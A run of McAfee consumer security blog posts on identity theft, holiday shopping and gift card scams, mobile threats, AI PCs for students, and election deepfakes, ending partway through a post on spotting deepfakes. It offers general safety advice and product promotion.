In its simplest form, your digital identity is made up of a whole host of things that can be traced back to you and who you are. That can range anywhere from photos you post online to online shopping accounts, email accounts to telephone numbers, and bank accounts to your tax ID.  

In this way, your digital identity is like dozens upon dozens of puzzle pieces made up of different accounts, ID numbers, and so forth. When put together, they create a picture of you. And that’s why those little puzzle pieces of your identity are such attractive targets for hackers. If they get the right combination of them, you can end up a victim of theft or fraud.  

People under 60 are major targets for fraud 

Here’s what’s happening: people under 60 were twice as likely to report losing money while shopping online. The spotlight also shows that adults under 60 are more than four times more likely to report losing money to an investment scam, and the majority of those losses happened in scams involving some form of cryptocurrency investments.

And it’s no surprise younger adults get targeted this way. They’re far more likely than any other age group to use mobile apps for peer-to-peer payments, transfer money between accounts, deposit checks, and pay bills. In short, there’s a lot of money flowing through the palms of their hands thanks to their phones, as well as their computers. 

Protecting yourself from hackers and fraud means protecting your digital identity. And that can feel like a pretty huge task given all the information your digital identity includes. It can be done, though, especially if you think about your identity like a puzzle. A piece here, another piece there, can complete the picture (or complete it just enough) to give a hacker what they need to separate you from your money. Thus, the way to stay safe is to keep those puzzle pieces out of other people’s hands.  

Six ways you can protect your digital identity from hackers and fraud 

It’s actually not that tough. With a few new habits and a couple of apps to help you out, you can protect yourself from the headaches and flat-out pain of fraud. Here’s a list of straightforward things that you can get started on right away: 

1. Start with the basics—security software  

Protect yourself by protecting your stuff. Installing and using security software on your computers and phones can prevent all kinds of attacks and make you safer while you surf, bank, and shop online. I should emphasize it again—protect your phone. Only about half of people protect their phones even though they use them to hail rides, order food, send money to friends, and more. Going unprotected on your phone means you’re sending all that money on the internet in a way that’s far, far less safe than if you use online protection. 

2. Create strong passwords  

You hear this one all the time and for good reason—strong, unique passwords offer one of your best defenses against hackers. Never re-use them (or slight alterations of them) across the different platforms and services you use. Don’t forget to update them on the regular (that means at least every 60 days)! While that sounds like a lot of work, a password manager can keep on top of it all for you. And if your platform or service offers the use of two-factor authentication, definitely make use of that. It’s a further layer of security that makes hacking tougher for crooks. 

3. Keep up to date with your updates  

Updates have a way of popping up on our phones and computers nearly every day, resist the urge to put them off until later. Aside from making improvements, updates often include important security fixes. So, when you get an alert for your operating system or app on your devices, go ahead and update. Think of it as adding another line of defense from hackers who are looking to exploit old flaws in your apps.   

4. Think twice when you share  

Social media is one place hackers go to harvest personal information because people sometimes have a way of sharing more than they should. With info like your birthday, the name of your first school, your mother’s maiden name, or even the make of your first car, they can answer common security questions that could hack into your accounts. Crank up the privacy settings on your accounts so only friends and family can see your posts—and realize the best defense here is not to post any possibly sensitive info in the first place. Also, steer clear of those “quizzes” that sometimes pop up in your social feeds. Those are other ways that hackers try to gain bits of info that can put your identity at risk. 

5. Shred it  

Even though so many of us have gone paperless with our bills, identity theft by digging through the trash, or “dumpster diving,” is still a thing. Things like medical bills, tax documents, and checks still might make their way to your mailbox. You’ll want to dispose of them properly when you’re through with them. First, invest in a paper shredder. Once you’ve online deposited that check or paid that odd bill, shred it so that any personal or account info on there can’t be read (and can be recycled securely). Second, if you’re heading out of town for a bit, have a friend collect your mail or have the post office put a temporary hold on your mail. That’ll prevent thieves from lifting personal info right from your mailbox while you’re away. 

6. Check your credit  

Even if you don’t think there’s a problem, go ahead and check your credit. The thing is, someone could be charging things against your name without you even knowing it. Depending on where you live, different credit reporting agencies keep tabs on people’s credit. In the U.S., the big ones are Equifax, Experian, and TransUnion. Also in the U.S., the Fair Credit Reporting Act (FCRA) requires these agencies to provide you with a free credit check at least once every 12 months. Canada, the UK, and other nations likewise offer ways to get a free credit report. Run down your options—you may be surprised by what you find. 

How do I know if my identity has been stolen?  

As I just mentioned, the quickest way to get sense of what’s happening with your identity is to check your credit. Identity theft goes beyond money. Crooks will steal identities to rent apartments, access medical services, and even get jobs. Things like that can show up on a credit report, such as when an unknown address shows up in a list of your current and former residences or when a company you’ve never worked for shows up as an employer. If you spot anything strange, track it down right away. Many businesses have fraud departments with procedures in place that can help you clear your name if you find a charge or service wrongfully billed under your name. 

Other signs are far more obvious. You may find collection agencies calling or even see tax notices appearing in your mailbox (yikes). Clearly, cases like those are telltale signs that something is really wrong. In that case, report it right away: 

• If you live in the U.S. and think that someone is using your personal information, visit IdentityTheft.gov. 
• In Canada, visit antifraudcentre-centreantifraude.ca for help.  
• And in the UK, check out CIFAS, the UK’s fraud prevention service, at cifas.org.uk. 

Likewise, many nations offer similar government services. A quick search will point you in the right direction. 

Another step you can take is to ask each credit bureau to freeze your credit, which prevents crooks from using your personal information to open new lines of credit or accounts in your name. Fraud alerts offer another line of protection for you as well, and you can learn more about fraud alerts here. 

Keeping your digital identity in your hands 

With so many bits and pieces of information making up your digital identity, a broader way of keeping it safe involves asking yourself a question: what could happen if someone got their hands on this info? Further realizing that even little snippets of unsecured info can lead to fraud or theft in your name helps—even that un-shredded bill or innocuous refund check for a couple of bucks could give a crook the puzzle piece they need. You can keep your digital identity safe by keeping those pieces of info out of other people’s hands.

The post How to Protect Your Digital Identity appeared first on McAfee Blog.

As Black Friday approaches, eager bargain hunters are gearing up to snag the best deals online. But with the excitement of holiday shopping also comes the risk of cyber threats, as cybercriminals see this busy time as an opportunity to exploit unsuspecting shoppers. Here’s what you need to know to protect yourself from potential risks while scoring your favorite holiday deals. 

The Growing Threat: Cybercrime During Black Friday 

Authorities are already sounding the alarm about the risks associated with online shopping during the festive season. Cybersecurity agencies, including the UK’s National Cyber Security Centre (NCSC) and the Canadian Royal Canadian Mounted Police (RCMP), have warned that cybercriminals are using increasingly sophisticated tactics, including leveraging AI to create more convincing scams, malicious ads, and spoofed websites. In the United States, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) have issued advisories to stay vigilant against ransomware attacks during holiday periods when many businesses operate with minimal staff. Cybercriminals take advantage of widely celebrated holidays like Black Friday to launch impactful attacks. 

What’s New About AI Scams? 

 Modern AI tools have made it easier for scammers to create: 

• Convincing fake websites that look identical to real stores 

• Personalized phishing emails that sound like they’re from legitimate companies 

• Realistic-looking social media ads with too-good-to-be-true deals 

• Counterfeit shopping apps that mimic popular retailers 

• Fake customer service chatbots that steal your information 

Top Black Friday Scams and How to Avoid Them 

 During the bustling shopping period that spans Thanksgiving, Black Friday, Small Business Saturday, and Cyber Monday, online sales hit record highs, and cybercriminals follow the money trail. Here are some of the most common scams to watch out for and ways to protect yourself.

1. Phishing Emails and Social Media Scams

 Phishing attacks often involve fake emails or social media messages that mimic legitimate promotional offers or shipping notifications. These messages are designed to trick you into revealing sensitive information, such as credit card details, or to download malware onto your device. Common tactics include sending fake order confirmations or gift card scams, which pressure recipients to act quickly by purchasing gift cards to resolve a fabricated issue. 

• Verify Before You Click: Always check the sender’s email address and look for typos or inconsistencies in logos and branding. If an offer seems too good to be true, it probably is. 

• Don’t Rush: Scammers use urgency to pressure you into acting without thinking. Take a moment to verify any email or message that claims you need to make a payment or resolve an issue. 

• Avoid Unverified Links: Go directly to the retailer’s website rather than clicking on links in emails or social media posts.

2. Spoofed Websites and Fake Online Stores

Fake websites that imitate popular online retailers pop up frequently during the Black Friday shopping season. These sites may look identical to the real thing, but their sole purpose is to steal your payment information. 

• Check the URL: Make sure the website’s URL starts with “https” and matches the official domain name. Look for trust seals or security badges, which can indicate a secure site. 

• Shop at Trusted Retailers: Stick to well-known stores and verify any unfamiliar ones by reading reviews or checking with the Better Business Bureau. 

• Use Secure Payment Methods: Pay with a credit card, which offers better fraud protection than a debit card.

3. Malicious Ads (Malvertising) and E-Skimming

Malicious advertisements can infiltrate legitimate websites, leading you to infected sites that install malware on your device. E-skimming occurs when hackers insert malicious code into payment pages on legitimate eCommerce sites, stealing your credit card information during checkout. 

• Block Ads: Use a reputable ad blocker to reduce the risk of encountering malvertising. 
• Review Payment Page Security: Before entering payment details, ensure the site uses secure encryption by checking for “https” in the URL and looking for a padlock icon. 
• Enable Transaction Alerts: Set up alerts with your bank to detect unauthorized charges quickly.

4. Identity Theft and Credit Card Fraud

During the busy holiday season, identity theft and credit card fraud rise sharply. Cybercriminals use stolen personal information to make fraudulent purchases or open accounts in your name. 

• Monitor Bank and Credit Card Statements: Regularly check your accounts for any unauthorized transactions and report suspicious activity immediately. 
• Use Digital Wallets: Digital payment methods like Apple Pay or PayPal provide an extra layer of security by masking your credit card details. 
• Implement Strong Passwords: Create unique, strong passwords for each of your online accounts and consider using a password manager. 

Shopping Safely: Additional Precautions for Black Friday Shoppers 

Here are some extra tips to keep your online shopping secure during the holiday season:  

• Avoid Public Wi-Fi: When shopping online, use a secure network to protect your personal information. Public Wi-Fi networks are often less secure, making it easier for hackers to intercept your data. 
• Enable Multi-Factor Authentication (MFA): This adds an extra layer of security to your accounts by requiring a second form of verification beyond just a password. 
• Update Your Devices: Ensure that your computer, smartphone, and apps have the latest security updates to protect against known vulnerabilities. 
• Know the Return Policy: Before making any purchase, check the retailer’s return and refund policy to avoid potential issues if you encounter a scam. 

Stay Safe While Saving 

 While Black Friday is a fantastic time to grab deals, it’s also a time to be extra cautious. By understanding common threats and following these safety tips, you can enjoy your holiday shopping while minimizing the risks. Remember, If a deal seems too good to be true, it probably is. Legitimate retailers won’t pressure you into quick decisions or require unusual payment methods. Take your time, verify offers, and trust your instincts. 

The best defense against AI scams is a careful, methodical approach to holiday shopping. Create a budget, make a list of what you want to buy, and stick to trusted retailers. A missed deal is better than falling victim to a scam. 

The post How To Protect Yourself from Black Friday and Cyber Monday AI Scams  appeared first on McAfee Blog.

Crooks love a good gift card scam. It’s like stealing cash right out of your pocket. 

That includes Amazon and Target gift cards, Apple and Google gift cards, Vanilla and Visa gift cards too. Scammers go after them all. 

In the U.S. and Canada, the Better Business Bureau (BBB), the Federal Trade Commission (FTC), and the Canadian Anti-Fraud Centre have issued warnings about several types of gift card scams floating around this time of year.  

The scams fall under three broad categories: 

Payment scams — Here, gift card scams take their classic form. A scammer asks for payment with a gift card rather than a payment method a victim can contest, such as a credit card. When victims realize they’ve been scammed, they have no way of getting their money back. 

Bogus balance-checking sites — These sites promise to check the balance on gift cards. However, they’re phishing sites. Entering card info into these sites gives scammers everything they need to steal the card balance for themselves. 

Gift card tampering — This involves draining gift cards of funds after they’re purchased. Organized crime rackets steal the cards from stores and then restock them on shelves — only after they’ve scanned the barcodes and pin numbers or altered them in some way. When a victim purchases and activates the card, the crooks launder the money and leave the victim with an empty card. 

Why all this focus on gift cards? They truly are as good as cash. When that money is gone, it’s gone. Yet better, it can get whisked away electronically quicker than the quickest of pickpockets.  

Fortunately, you can avoid these scams rather easily when you know what to look for.  

Gift card scams — just how bad is it out there? 

Not great. According to the U.S. Federal Trade Commission (FTC), they received nearly 50,000 reports of gift card fraud in 2022. Those losses racked up more than $250 million. Through September 2023, the BBB and FTC reported a 50% increase in cases of gift card scams over the same period in 2022. So far, that accounts for 29,000 reports and $147 million in losses — a figure that will surely climb much higher as October, November, and December roll by. 

Affected cards include the usual list of well-known and reputable brands, such as Walmart, Target, Apple, Google, Amazon, Best Buy, and the Steam gaming platform. Back in 2021, Target gift cards racked up the biggest losses, an average of $2,500 per victim, according to the FTC. 

Canada has seen a jump in reports as well. According to the BBB and the Canadian Anti-Fraud Centre, January through August 2023 saw roughly 1,200 reports with $3.5 million in losses for an average loss of roughly $2,900. 

What are scammers asking people to pay for with gift cards? 

If you can imagine a transaction of any kind, a scammer will likely try to get you to pay for it with gift cards. 

Some of the more striking examples include scammers who pose as dog breeders who take gift cards as advance payment. They also lurk in online marketplaces and local buy-sell groups, preying on victims looking to buy anything from furniture to golf carts.  

And as we’ve reported in the past, scammers often pose as government officials. In these cases, they level heavy threats and demand payment for fines and back taxes, all with gift cards. That’s a sure sign of a scam. 

Some scammers go to greater lengths by setting up phony online stores that only accept payment with gift cards. One high-profile example — the phony ticket sites for major sporting events like the Super Bowl and World Cup. Many of those sites offered gift cards as a payment option. In other instances, scammers set up similar bogus storefronts that sell lower-priced items like clothing and bags. 

Lastly, we come around to those gift card balance-checking sites, which are really phishing sites. As reported by Tech Times, a user on Reddit uncovered a paid Google ad that directed people to one such site. 

Source: Reddit 

The ad is on the left. The phishing site is on the right. Note how Target is spelled as “Targets” in the ad, and the address on the phishing site is entirely different than Target.com. Yet that doesn’t stop the scammer from asking for all the info they need to steal funds from the card a victim enters. 

How to avoid gift card scams. 

Bottom line, if anyone, anywhere, asks you to pay for goods, services, or debts of any kind with a gift card, it’s a scam. Additionally, here’s further advice from us and the BBB: 

1. Remember that gift cards are for gifts. Never for payments. 

This reinforces the advice above. The crooks who run gift card scams pose as utility companies, the government, lottery officials, tech support from big-name companies, even family members — just about anyone. Yet what all these scams have in common is urgency. Scammers use high-pressure tactics to trick victims into paying with gift cards.  And paying quickly. 

2. Look for signs of tampering with your physical gift card. 

Earlier we mentioned gift card tampering, where scammers either copy or alter the card info and then steal funds when the card is purchased. Signs of tampering include a bar code that’s affixed to the card with a sticker, a PIN that’s been exposed, or packaging that looks like it’s been altered in any way. If possible, purchase gift cards that are behind a counter where they are monitored. This can decrease the risk of purchasing a gift card that’s been tampered with. Also, save your receipt in the event of an issue. 

3. Purchase online gift cards from reputable retailers. 

One way you can avoid the tampering scenario above is to pick up online gift cards. Several reputable retailers and brands offer them. 

4. Check your balance at the retailer or with their official app. 

Both can tell you what your card balance is, securely and accurately. Avoid any site online that offers to check your balance for you. 

 5. Treat your gift cards like cash. 

That’s what they are. If the brand or retailer issuing the card allows you to register the card, do so. And if it further allows you to change the PIN, do that as well. This way, you can report card theft with an eye to getting your money back — while changing the PIN can help keep scammers from using the card altogether. 

What can I do if I fall for a gift card scam? 

If you fall victim to a scam, report it. Organized crime operations big and small often run them, and reports like yours can help shut them down.  

• In the U.S., head to ReportFraud.ftc.gov.  
• In Canada, visit https://www.antifraudcentre-centreantifraude.ca/report-signalez-eng.htm.  
• For a list of popular gift card companies and how to report theft to them, visit this link provided by the FTC.  

More ways to beat the scammers — with online protection. 

Online protection like ours offers several features that can help steer you clear of scams. It can detect suspicious links, warn you of scam sites, and remove your personal info from sketchy data broker sites. 

Text Scam Detector: McAfee’s patented and powerful AI technology helps you stay safer amid the rise in phishing scams. Including phishing scams generated by AI. It detects suspicious URLs in texts before they’re opened or clicked on. No more guessing if that text you just got is real or fake. 

Web protection: And if you accidentally click on a suspicious link in a text, email, social media, or browser search, our web protection blocks the scam site from loading.  

McAfee Personal Data Cleanup: Scammers must have gotten your contact info from somewhere, right? Often, that’s an online data broker — a company that keeps thousands of personal records for millions of people. And they’ll sell those records to anyone. Including scammers. A product like our Personal Data Cleanup can help you remove your info from some of the riskiest sites out there. 

More sound advice. Stick with known, legitimate retailers online. 

It’s gift-giving season, so it comes as no surprise that we’re seeing a spike in gift card scams. What makes this year’s jump so striking is the trending increase over last year’s numbers. 

Remembering that gift cards are for gifts and never for payments can help you from falling for one of these scams. That and inspecting gift cards closely for tampering or opting for an online gift card can help as well. And as always, strong online protection like ours helps keep you safer from scammers as you shop, go through your messages, or simply surf around. 

The post Gift Card Scams — The Gift That Keeps on Taking appeared first on McAfee Blog.

Scary movies are great. Scary mobile threats, not so much. 

Ghosts, killer clowns, and the creatures can stir up all sorts of heebie-jeebies. The fun kind. Yet mobile threats like spyware, living dead apps, and botnets can conjure up all kinds of trouble. 

Let’s get a rundown on the top mobile threats — then look at how you can banish them from your phone. 

“I Know What You Did Because of Spyware” 

Spyware is a type of malware that lurks in the shadows of your trusted device, collecting information around your browsing habits, personal information and more. Your private information is then sent to third parties, without your knowledge. Spooky stuff. 

“Dawn of the Dead Apps” 

Think haunted graveyards only exist in horror movies? Think again! Old apps lying dormant on your phones are like app graveyards, Many of these older apps may no longer be supported by Google or Apple stores. Lying there un-updated, these apps might harbor vulnerabilities. And that can infect your device with malware or leak your data to a third party. 

“Bone Chilling Botnets” 

Think “Invasion of the Body Snatchers,” but on your mobile device. What is a botnet you ask? When malware infiltrates a mobile device (like through a sketchy app) the device becomes a “bot.” This bot becomes one in an army of thousands of infected internet-connected devices. From there, they spread viruses, generate spam, and commit sorts of cybercrime.  Most mobile device users aren’t even aware that their gadgets are compromised, which is why protecting your device before an attack is so important. 

“Malicious Click or Treat” 

Clicking links and mobile devices go together like Frankenstein and his bride. Which is why ad and click fraud through mobile devices is becoming more prevalent for cybercriminals. Whether through a phishing campaign or malicious apps, hackers can gain access to your device and your private information. Always remember to click with caution. 

“IoT Follows” 

The Internet of Things (IoT) has quickly become a staple in our everyday lives, and hackers are always ready to target easy prey. Most IoT devices connect to mobile devices, so if a hacker can gain access to your smartphone, they can infiltrate your connected devices as well. Or vice versa. 

Six steps for a safer smartphone

1) Avoid third-party app stores. Unlike Google Play and Apple’s App Store, which have measures in place to review and vet apps to help ensure that they are safe and secure, third-party sites may very well not. Further, some third-party sites may intentionally host malicious apps as part of a broader scam.  

Granted, hackers have found ways to work around Google and Apple’s review process, yet the chances of downloading a safe app from them are far greater than anywhere else. Further, both Google and Apple are quick to remove malicious apps once discovered, making their stores that much safer. 

2) Review with a critical eye. As with so many attacks, hackers rely on people clicking links or tapping “download” without a second thought. Before you download, take time to do some quick research. That may uncover some signs that the app is malicious. Check out the developer—have they published several other apps with many downloads and good reviews? A legit app typically has quite a few reviews, whereas malicious apps may have only a handful of (phony) five-star reviews.  

Lastly, look for typos and poor grammar in both the app description and screenshots. They could be a sign that a hacker slapped the app together and quickly deployed it. 

3) Go with a strong recommendation. Yet better than combing through user reviews yourself is getting a recommendation from a trusted source, like a well-known publication or from app store editors themselves. In this case, much of the vetting work has been done for you by an established reviewer. A quick online search like “best fitness apps” or “best apps for travelers” should turn up articles from legitimate sites that can suggest good options and describe them in detail before you download. 

4) Keep an eye on app permissions. Another way hackers weasel their way into your device is by getting permission to access things like your location, contacts, and photos—and they’ll use sketchy apps to do it. (Consider the long-running free flashlight app scams mentioned above that requested up to more than 70 different permissions, such as the right to record audio, and video, and access contacts.

So check and see what permissions the app is requesting. If it’s asking for way more than you bargained for, like a simple game wanting access to your camera or microphone, it may be a scam. Delete the app and find a legitimate one that doesn’t ask for invasive permissions like that. If you’re curious about permissions for apps that are already on your phone, iPhone users can learn how to allow or revoke app permission here, and Android can do the same here. 

5) Get scam protection. Plenty of scams find your phone by way of sketchy links sent in texts, messages, and emails. Our Text Scam Detector can block them before they do you any harm. And if you tap that link by mistake, Scam Protection still blocks it. 

6) Protect your smartphone with security software. With all that we do on our phones, it’s important to get security software installed on them, just like we install it on our computers and laptops. Whether you go with comprehensive security software that protects all of your devices or pick up an app in Google Play or Apple’s App Store, you’ll have malware, web, and device security that’ll help you stay safe on your phone.  

The post The Top 5 Scariest Mobile Threats appeared first on McAfee Blog.

In today’s fast-paced educational environment, productivity is a key determinant of academic success. Enter AI PCs—computers enhanced with artificial intelligence (AI) capabilities—that are reshaping how students interact with productivity tools. AI PCs are designed with built-in AI capabilities that optimize performance and user experience by leveraging machine learning algorithms to enhance software applications. This makes routine tasks more efficient and allows for a more personalized user experience.

For students, this means AI tools are becoming not just supplementary resources but integral parts of their academic toolkit. A new report, “The Dawn of the AI Era: Teens, Parents, and the Adoption of Generative AI at Home and School,” found that seven in 10 teenagers say they have used at least one type of generative AI tool, with 40% report using generative AI for school assignments.

From advanced writing assistants to research enhancers, these AI-driven machines have the power to elevate the academic experience. This blog post will explore how AI PCs integrate with AI tools to boost productivity and offer actionable tips to maximize these features for academic success.

1. Instant Research Assistance

ChatGPT, an AI language model developed by OpenAI, serves as a powerful research assistant, capable of summarizing articles, generating topic ideas, and answering questions on a wide range of subjects. When integrated into an AI PC, ChatGPT can be accessed directly from the desktop or through dedicated applications, providing students with on-demand research support. Several other AI tools can also greatly benefit students in research and writing, such as Google Bard, Jasper, and Copy.ai.

McAfee Tip: Use an AI tool like ChatGPT to brainstorm ideas and outline essays or research papers. For instance, if you’re writing a paper on climate change, ChatGPT can help you outline key points, suggest relevant sources, and even provide a summary of complex scientific articles.

2. Enhanced Writing Capabilities

Beyond research, AI tools can assist with writing tasks by generating content, offering suggestions, and even helping with creative projects. Its ability to understand context and generate coherent text means that students can use it for drafting essays, creating reports, or even composing emails.

McAfee Tip: Check with your school policies to ensure you remain compliant with their rules around AI usage. For example, use the tool to generate insights and ideas, but cross-check and cite any specific sources or information included in your work to maintain academic integrity.

3. Real-Time Grammar and Style Checks

Grammarly, an AI-powered writing assistant, is renowned for its grammar and style-checking capabilities. On an AI PC, Grammarly is not just a browser extension but a deeply integrated tool that offers real-time feedback on spelling, punctuation, and stylistic errors. This seamless integration ensures that students can produce polished and professional documents with ease.

McAfee Tip: Use Grammarly’s advanced features, such as clarity and engagement suggestions, to help enhance the readability of your work. Before submitting any paper, run it through Grammarly’s plagiarism checker to ensure that all sources are properly cited and that your work is original.

4. Efficient Study Sessions

AI PCs can streamline study sessions by using tools to create comprehensive study guides, generate practice questions, and summarize textbook chapters. For example, AI PCs can integrate with note-taking apps, like Evernote and Microsoft OneNote, to organize lecture notes, create study guides, and sync information across devices. AI features can then assist in summarizing notes and organizing content for easier review.

McAfee Tip: Zotero and Mendeley can help students organize research papers, manage citations, and create bibliographies. Integration with Khan Academy and Coursera on AI PCs allows students to access and interact with educational content, complete with AI-driven recommendations for supplemental learning and practice.

5. Enhanced Collaboration

For group projects, AI tools can enhance collaboration by providing a platform for drafting and reviewing content together. AI PCs with integrated ChatGPT can help in brainstorming sessions, while Grammarly ensures that all written contributions are cohesive and professionally presented. Integration with tools like Natural Reader and Otter.ai to convert text to speech and vice versa can help with reviewing study materials and transcribing spoken content into written form.

McAfee Tip: Utilize shared documents with built-in Grammarly and ChatGPT features to collaborate on essays or research papers. This allows for real-time feedback and adjustments, leading to a more polished final product.

6. Ensure Authentic Sources

In the realm of online research and media consumption, discerning authentic content from manipulated material is increasingly important. This is where McAfee Deepfake Detector comes into play. Integrated into AI PCs, this tool provides real-time alerts when it detects AI-generated audio within videos. By utilizing advanced AI technology, Deepfake Detector helps students quickly identify whether a video’s audio has been manipulated, right from their browser without extra steps.

McAfee Tip: When engaging with online videos for research or study, use Deepfake Detector to ensure the content is authentic. This tool helps you avoid falling for misleading or false information, which is crucial for maintaining the integrity of your academic work.

Ultimately, AI PCs are revolutionizing students’ daily academic routines by integrating advanced AI tools into everyday life. AI-driven tools are offering unprecedented support in writing, research, and creative projects, making them invaluable assets in achieving academic and professional success. By leveraging these capabilities, students can enhance their productivity, produce high-quality work, and prepare for future challenges with confidence.

The post How AI PCs Are Optimizing Productivity Tools for Students appeared first on McAfee Blog.

As malicious deepfakes continue to flood our screens with disinformation during this election year, we’ve released our 2024 Election AI Toolkit to help voters protect themselves and their vote. 

Our own research reveals just how deep the problem runs. More than six in ten (63%) of Americans said they’ve seen a deepfake in the past 60 days. As for the impact of those deepfakes, nearly half (48%) who’ve seen one said it’s influenced who they’ll vote for in the upcoming election.  

In all, we found that 91% of Americans said they’re concerned that AI-generated disinformation could interfere with public perception of candidates, their platforms, or even election results. 

The explosive rise of disinformation, powered by AI tools

Disinformation has played a long and shady role in politics. For some time now. George Washington fell victim to it in 1777 when forged letters painted him as a British sympathizer — disinformation that followed him to the first presidency. [i]

And it’s appeared on the internet for some time too. For years, creating disinformation on the internet called for plenty of manual labor. Writers, designers, and developers all put hours into writing, creating images, and creating sites for spreading disinformation. Now, it takes just one person mere minutes. The advent of cheap and free AI tools has put disinformation into overdrive. 

We’ve seen an explosive rise in malicious deepfakes in the run-up to Election Day.  

• In just the first three months of 2024, the volume of deepfakes in the U.S. surged by 303% compared to the start of 2023. [ii]

• Fake news sites loaded with AI-generated photos and articles have grown from an estimated 49 sites in May 2023 to more than 700 in February 2024. [iii]

• Follow-up research pushes the estimated number of AI-powered fake news sites yet higher. In June, analysts discovered 1,265 sites targeting U.S. internet users with fake news – many posing as “local” news outlets. That figure surpasses the number of local newspapers still running in the U.S., at just 1,213 outlets. [iv]

• A British nonprofit dedicated to fighting hate speech and extremism online found that AI-generated disinformation has been rising by an average of 130% per month on X (formerly Twitter) over the past year. [v]

With polling in some states already underway, we can expect the glut of malicious deepfakes to continue. They might: 

• Target politicians and their families, using deepfakes that cast them in a bad light. 

• Create other deepfakes that soften the image of a candidate, known as softfakes, to make them seem more appealing. 

• Spread phony polling info that prevents voters from getting to polling places in a timely way — or at all.  

• Use deepfakes to skew polling results, all with the aim of influencing voters. 

• Use other deepfakes to undermine confidence in the electoral process.

With that, it’s little surprise that nearly 60% of Americans say that they’re extremely or very concerned about AI’s influence on the election.[vi] Deepfakes have simply become pervasive.

Disinformation isn’t new. Using the power of AI to spread it is. 

AI has given new life to the old problem of disinformation and fake news. In many ways, it’s supercharged it. 

It’s done so in two primary ways: 

1. Bogus articles and doctored photos once took time and effort to cook up. Now, they take seconds.
2. AI tools can effectively clone voices and people to create convincing-looking deepfakes in digital form. 

In all, it’s easier, cheaper, and quicker than ever to create malicious deepfakes with AI tools. On top of that, the image and sound quality of deepfakes continues to improve. In all, it’s only getting tougher when it’s time to tell the difference between what’s real and what’s fake. 

Taken together, this has put voters in a lurch. Who and what can they trust online? 

You’re not powerless in the face of malicious AI. Quite the opposite. 

Even as the creators of malicious AI-generated content have gotten cagier in their ways, their work still gives off signs of a fake. However, spotting this malicious content calls for extra effort on everyone’s part when getting their news or scrolling their feeds online. That means scrutinizing what we consume and relying on trusted fact-checking resources to get at the truth. It also means using AI as any ally, with AI tools that detect AI deepfakes in real time. 

Our Election Year Toolkit will help you do just that. It covers the basics of fake news and malicious AI deepfakes, how to spot them, and more. As you’ll see, it’s a topic both broad and deep, and we explore it in a step-by-step way that helps make sense of it all for voters. 

Our role in the fight against malicious deepfakes.

Sharing info about AI with voters is one of several steps we’ve taken to fight against malicious deepfakes. 

In a first-of-its-kind collaboration, we’ve teamed up with Yahoo News to bolster the credibility of images on the Yahoo News platform. This collaboration integrates McAfee’s sophisticated deepfake image detection technology into Yahoo News’s content quality system, offering readers an added layer of trust.  

And we’re rolling out our McAfee Deepfake detector through our partners too. It checks audio being played through your browser to figure out if the content you’re watching or listening to contains AI-generated audio. When AI audio is detected, users are notified in seconds. 

Bad actors put an entirely new spin on disinformation with malicious deepfakes.

AI makes disinformation look and sound far more credible than ever. And bad actors can produce it on a tremendous scale, thanks to the ease and speed of AI tools. In an election year that calls for more scrutiny on our collective part — and our 2024 Election AI Toolkit can help. It covers how to spot a deepfake, how they spread, and several fact-checking resources that you can rely on when that bit of news you stumble across seems a little sketchy. 

Download the full McAfee AI Election Toolkit here

References

[i] https://www.politifact.com/article/2022/feb/21/when-george-washington-fought-misinformation/

[ii] https://sumsub.com/newsroom/deepfake-cases-surge-in-countries-holding-2024-elections-sumsub-research-shows/

[iii] https://www.newsguardtech.com/press/newsguard-launches-2024-election-misinformation-tracking-center-rolls-out-new-election-safety-assurance-package-for-brand-advertising/

[iv] https://www.newsguardtech.com/press/sad-milestone-fake-local-news-sites-now-outnumber-real-local-newspaper-sites-in-u-s/

[v] https://techcrunch.com/2024/03/06/political-deepfakes-are-spreading-like-wildfire-thanks-to-genai/

[vi] https://www.pewresearch.org/short-reads/2024/09/19/concern-over-the-impact-of-ai-on-2024-presidential-campaign/

The post How To Survive the Deepfake Election with McAfee’s 2024 Election AI Toolkit appeared first on McAfee Blog.

Think you can spot a fake on social media? It’s getting tougher. Particularly as deepfake technology gets far better and far easier to use.

Here’s why that matters.

You might find yourself among the 50% of Americans who say they get their news on social media at least “sometimes.”[i] Plenty of deepfakes deliberately pose as legitimate news. You might also stumble across promos or deals on social media. Scammers create yet more deepfakes for phony giveaways and bogus investment opportunities.

In short, what you’re seeing might be a fake. And your odds of stumbling across a deepfake on social media are on the climb.

That means using social media today requires more scrutiny and skepticism, which are two of your best tools for spotting deepfakes.

The best way to spot deepfakes right now

Whether you’re staring down AI-generated text, photography, audio, or video, some straightforward steps can help you spot a fake. Even as AI tools create increasingly convincing deepfakes, a consistent truth applies — they’re lies. And you have ways of calling out a liar.

Slow down.

Malicious deepfakes share something in common. They play on emotions. And they play to biases as well. By stirring up excitement about a “guaranteed” investment or outrage at the apparent words of a politician or public figure, deepfakes cloud judgment. That’s by design. It makes deepfakes more difficult to spot because people want to believe them on some level.

With that, slow down. Especially if you see something that riles you up. This offers one of the best ways to spot a fake. From there, the next step is to validate what you’ve seen or heard.

Consider who did the posting.

Because what you’re seeing got posted on social media, you can see who posted the piece of content in question. If it’s a friend, did they repost it? Who was the original poster? Could it be a bot or a bogus account? How long has the account been active? What kind of other posts have popped up on it? If an organization posted it, look it up online. Does it seem reputable? This bit of detective work might not provide a definitive answer, but it can let you know if something seems fishy.

Seek another source.

Whether they aim to spread disinformation, commit fraud, or rile up emotions, malicious deepfakes try to pass themselves off as legitimate. Consider a video clip that looks like it got recorded at a press conference. The figure behind the podium says some outrageous things. Did that really happen? Consult other established and respected sources. If they’re not reporting on it, you’re likely dealing with a deepfake.

Moreover, they might report that what you’re looking at is a deepfake that’s making the rounds on the internet. Consider the Taylor Swift “Le Creuset scam” of early 2024. News outlets quickly revealed that the singer was not giving away free, high-end cookware.

A technique called SIFT can help root out a fake. It stands for: Stop, Investigate the source, Find better coverage, and Trace the media to the original context. With the SIFT method, you can indeed slow down and determine what’s real.

Have a professional fact-checker do the work for you.

De-bunking fake news takes time and effort. Often a bit of digging and research too. Professional fact-checkers at news and media organizations do this work daily. Posted for all to see, they provide a quick way to get your answers. Some fact-checking groups include:

• Politifact.com
• Snopes.com
• Factcheck.org
• Reuters Fact Check
• AP Fact Check

What are typical signs of a deepfake?

This gets to the tricky bit. The AI tools for creating deepfakes continually improve. It’s getting tougher and yet tougher still to spot the signs of a deepfake. The advice we give here now might not broadly apply later. Still, bad actors still use older and less sophisticated tools. As such, they can leave signs.

How to spot AI-generated text.

Look for typos. If you spot some, a human likely did the writing. AI generally writes clean text when it comes to spelling and grammar.

